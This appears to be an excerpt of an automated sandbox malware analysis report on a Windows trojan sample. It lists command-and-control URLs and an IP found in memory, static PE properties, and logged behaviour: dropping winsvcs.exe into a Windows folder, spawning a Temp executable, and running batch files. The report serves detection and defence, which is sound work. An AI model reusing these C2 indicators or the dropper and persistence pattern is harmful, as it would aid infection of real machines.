        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.in/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.net/tldr.php?newinf=1LA
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.su/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.su/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssofhoseuegsgrfnj.su/tldr.php?newinf=1U1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://ssofhoseuegsgrfnu.ru/
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ssofhoseuegsgrfnu.ru/http://92.63.197.48/http://slpsrgpsrhojifdij.ru/http://aiiaiafrzrueuedur
        Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
        Source: tldr[1].htm.6.drString found in binary or memory: http://ww88.ssofhoseuegsgrfnu.ru/
        Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
        Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
        Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
        Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
        Source: winsvcs.exe.0.drString found in binary or memory: http://www.codeproject.com/
        Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
        Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
        Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
        Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
        Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
        Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
        Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
        Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
        Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
        Source: XBVdJN.exe, 00000001.00000003.2333120316.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 00000001.00000002.2443353213.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000003.2549222413.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, XBVdJN.exe, 0000000A.00000002.2703021536.0000000000C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
        Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
        Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_88feab21-1

        System Summary

        barindex
        Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
        Source: XBVdJN.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeFile created: C:\Windows\94000696690303050Jump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeFile created: C:\Windows\94000696690303050\winsvcs.exeJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_0040B5170_2_0040B517
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_004338B40_2_004338B4
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_0042A1E90_2_0042A1E9
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00433DF80_2_00433DF8
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00436DB00_2_00436DB0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00435ABE0_2_00435ABE
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_0043433C0_2_0043433C
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00417F800_2_00417F80
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_006160761_2_00616076
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_00616D001_2_00616D00
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_0040B5176_2_0040B517
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_004338B46_2_004338B4
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_0042A1E96_2_0042A1E9
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00433DF86_2_00433DF8
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00436DB06_2_00436DB0
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00435ABE6_2_00435ABE
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_0043433C6_2_0043433C
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 6_2_00417F806_2_00417F80
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_0040B5179_2_0040B517
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_004338B49_2_004338B4
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_0042A1E99_2_0042A1E9
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00433DF89_2_00433DF8
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00436DB09_2_00436DB0
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00435ABE9_2_00435ABE
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_0043433C9_2_0043433C
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 9_2_00417F809_2_00417F80
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E607610_2_006E6076
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E6D0010_2_006E6D00
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_0040B51714_2_0040B517
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_004338B414_2_004338B4
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_0042A1E914_2_0042A1E9
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00433DF814_2_00433DF8
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00436DB014_2_00436DB0
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00435ABE14_2_00435ABE
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_0043433C14_2_0043433C
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: 14_2_00417F8014_2_00417F80
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_0018607615_2_00186076
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_00186D0015_2_00186D00
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\XBVdJN.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: String function: 00426FAC appears 34 times
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: String function: 00426FAC appears 102 times
        Source: C:\Windows\94000696690303050\winsvcs.exeCode function: String function: 00429BDE appears 51 times
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1584
        Source: LisectAVT_2403002B_290.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: winsvcs.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
        Source: Windows Archive Manager.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: LisectAVT_2403002B_290.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: XBVdJN.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: XBVdJN.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: XBVdJN.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
        Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@27/28@111/13
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 1_2_0061119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_0061119F
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 10_2_006E119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,10_2_006E119F
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeCode function: 15_2_0018119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,15_2_0018119F
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00401E97 CreateToolhelp32Snapshot,Process32First,CharLowerA,CloseHandle,Process32Next,FindCloseChangeNotification,0_2_00401E97
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_004020F8 CoInitialize,CoCreateInstance,0_2_004020F8
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeCode function: 0_2_00410C90 GetCurrentThreadId,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindResourceA,FindResourceA,LoadResource,LockResource,LoadResource,LockResource,DialogBoxIndirectParamA,GetLastError,GlobalHandle,GlobalFree,SetLastError,GetLastError,GetLastError,RaiseException,0_2_00410C90
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rarJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
        Source: C:\Windows\94000696690303050\winsvcs.exeMutant created: \Sessions\1\BaseNamedObjects\4950050503930
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeFile created: C:\Users\user\AppData\Local\Temp\XBVdJN.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeFile read: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_290.exe "C:\Users\user\Desktop\LisectAVT_2403002B_290.exe"
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeProcess created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1584
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeProcess created: C:\Windows\94000696690303050\winsvcs.exe C:\Windows\94000696690303050\winsvcs.exe
        Source: unknownProcess created: C:\Windows\94000696690303050\winsvcs.exe "C:\Windows\94000696690303050\winsvcs.exe"
        Source: C:\Windows\94000696690303050\winsvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\94000696690303050\winsvcs.exe "C:\Windows\94000696690303050\winsvcs.exe"
        Source: C:\Windows\94000696690303050\winsvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" "
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeProcess created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exeJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeProcess created: C:\Windows\94000696690303050\winsvcs.exe C:\Windows\94000696690303050\winsvcs.exeJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\05c412c7.bat" "Jump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\XBVdJN.exe C:\Users\user\AppData\Local\Temp\XBVdJN.exe
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\55fb1e02.bat" "
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_290.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: ntvdm64.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\XBVdJN.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\94000696690303050\winsvcs.exeSection loaded: mswsock.dllJump to behavior
